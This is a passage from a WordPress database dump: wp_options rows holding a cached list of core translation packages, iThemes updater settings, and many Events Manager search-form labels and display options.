(510,'ithemes-updater-cache','a:9:{s:12:\"server-cache\";i:30;s:10:\"expiration\";i:0;s:9:\"timestamp\";i:0;s:8:\"packages\";a:1:{i:0;s:11:\"backupbuddy\";}s:14:\"update_plugins\";a:0:{}s:13:\"update_themes\";a:0:{}s:12:\"use_ca_patch\";b:0;s:7:\"use_ssl\";b:1;s:14:\"quick_releases\";b:0;}','yes'),
(512,'_site_transient_timeout_available_translations','1424133214','yes'),
(513,'_site_transient_available_translations','a:49:{s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 19:01:24\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-27 15:23:28\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 19:05:14\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:22:\"Продължение\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-08 17:39:56\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-19 03:45:15\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-09 11:12:57\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 08:44:51\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Fortsæt\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-04 12:59:40\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Fortfahren\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-13 12:45:29\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Fortfahren\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 22:16:49\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 20:53:36\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-05 09:59:30\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-28 01:01:02\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-08 22:46:58\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-19 08:14:32\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/es_PE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 21:05:39\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/es_ES.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"es\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-05 15:18:10\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/es_MX.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:19:\"2014-09-04 19:47:01\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.0/es_CL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-09 12:20:08\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-23 14:29:09\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-17 07:01:16\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 19:01:48\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:19:\"2014-09-05 17:37:43\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.0/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 18:37:43\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-12 01:05:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/translation/core/4.1/haz.zip\";s:3:\"iso\";a:1:{i:2;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 14:11:31\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"להמשיך\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-19 14:39:57\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-07 11:10:15\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Tovább\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-31 07:30:24\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-12 09:29:09\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 10:53:40\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"続ける\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-21 03:05:42\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-08 00:36:50\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-21 19:07:31\";s:12:\"english_name\";s:7:\"Burmese\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ေဆာင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-10 16:35:13\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-23 08:38:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-08 21:24:15\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-02 11:59:53\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-21 11:05:23\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-11 09:08:03\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 18:16:58\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-12 19:18:28\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-13 22:38:48\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Nadaljujte\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-18 19:08:01\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 09:41:07\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-11 11:46:46\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-19 08:42:08\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-26 02:21:02\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-08 03:46:32\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}}','yes'),
(517,'_transient_bp_active_member_count','1','yes'),
(518,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),
(519,'widget_em_widget','a:2:{i:2;a:11:{s:5:\"title\";s:15:\"Upcoming Events\";s:5:\"limit\";s:1:\"3\";s:5:\"scope\";s:6:\"future\";s:7:\"orderby\";s:44:\"event_start_date,event_start_time,event_name\";s:5:\"order\";s:3:\"ASC\";s:8:\"category\";s:1:\"0\";s:15:\"all_events_text\";s:10:\"all events\";s:6:\"format\";s:73:\"<li>#F #d, #Y<ul><li>#_EVENTLINK</li><li>#_EVENTCATEGORIES</li></ul></li>\";s:10:\"nolistwrap\";b:0;s:10:\"all_events\";i:0;s:14:\"no_events_text\";s:18:\"<li>No events</li>\";}s:12:\"_multiwidget\";i:1;}','yes'),
(520,'_bbp_private_forums','a:0:{}','yes'),
(521,'_bbp_hidden_forums','a:0:{}','yes'),
(522,'_transient_timeout_ia_user_count','1424209548','no'),
(523,'_transient_ia_user_count','1','no'),
(531,'category_children','a:0:{}','yes'),
(532,'WPLANG','','yes'),
(539,'_site_transient_timeout_theme_roots','1426280413','yes'),
(540,'_site_transient_theme_roots','a:2:{s:7:\"commons\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";}','yes'),
(543,'dbem_events_page','41','yes'),
(544,'dbem_locations_page','42','yes'),
(545,'dbem_categories_page','43','yes'),
(546,'dbem_tags_page','44','yes'),
(547,'dbem_my_bookings_page','45','yes'),
(548,'dbem_hello_to_user','1','yes'),
(549,'dbem_time_format','g:i a','yes'),
(550,'dbem_date_format','d/m/Y','yes'),
(551,'dbem_date_format_js','dd/mm/yy','yes'),
(552,'dbem_dates_separator',' - ','yes'),
(553,'dbem_times_separator',' - ','yes'),
(554,'dbem_default_category','-1','yes'),
(555,'dbem_default_location','0','yes'),
(556,'dbem_events_default_orderby','event_start_date,event_start_time,event_name','yes'),
(557,'dbem_events_default_order','ASC','yes'),
(558,'dbem_events_default_limit','10','yes'),
(559,'dbem_search_form_submit','Search','yes'),
(560,'dbem_search_form_advanced','1','yes'),
(561,'dbem_search_form_advanced_hidden','1','yes'),
(562,'dbem_search_form_advanced_show','Show Advanced Search','yes'),
(563,'dbem_search_form_advanced_hide','Hide Advanced Search','yes'),
(564,'dbem_search_form_text','1','yes'),
(565,'dbem_search_form_text_label','Search','yes'),
(566,'dbem_search_form_geo','1','yes'),
(567,'dbem_search_form_geo_label','Near...','yes'),
(568,'dbem_search_form_geo_units','1','yes'),
(569,'dbem_search_form_geo_units_label','Within','yes'),
(570,'dbem_search_form_geo_unit_default','mi','yes'),
(571,'dbem_search_form_geo_distance_default','25','yes'),
(572,'dbem_search_form_geo_distance_options','5,10,25,50,100','yes'),
(573,'dbem_search_form_dates','1','yes'),
(574,'dbem_search_form_dates_label','Dates','yes'),
(575,'dbem_search_form_dates_separator','and','yes'),
(576,'dbem_search_form_categories','1','yes'),
(577,'dbem_search_form_categories_label','All Categories','yes'),
(578,'dbem_search_form_category_label','Category','yes'),
(579,'dbem_search_form_countries','1','yes'),
(580,'dbem_search_form_default_country','0','yes'),
(581,'dbem_search_form_countries_label','All Countries','yes'),
(582,'dbem_search_form_country_label','Country','yes'),
(583,'dbem_search_form_regions','1','yes'),
(584,'dbem_search_form_regions_label','All Regions','yes'),
(585,'dbem_search_form_region_label','Region','yes'),
(586,'dbem_search_form_states','1','yes'),
(587,'dbem_search_form_states_label','All States','yes'),
(588,'dbem_search_form_state_label','State/County','yes'),
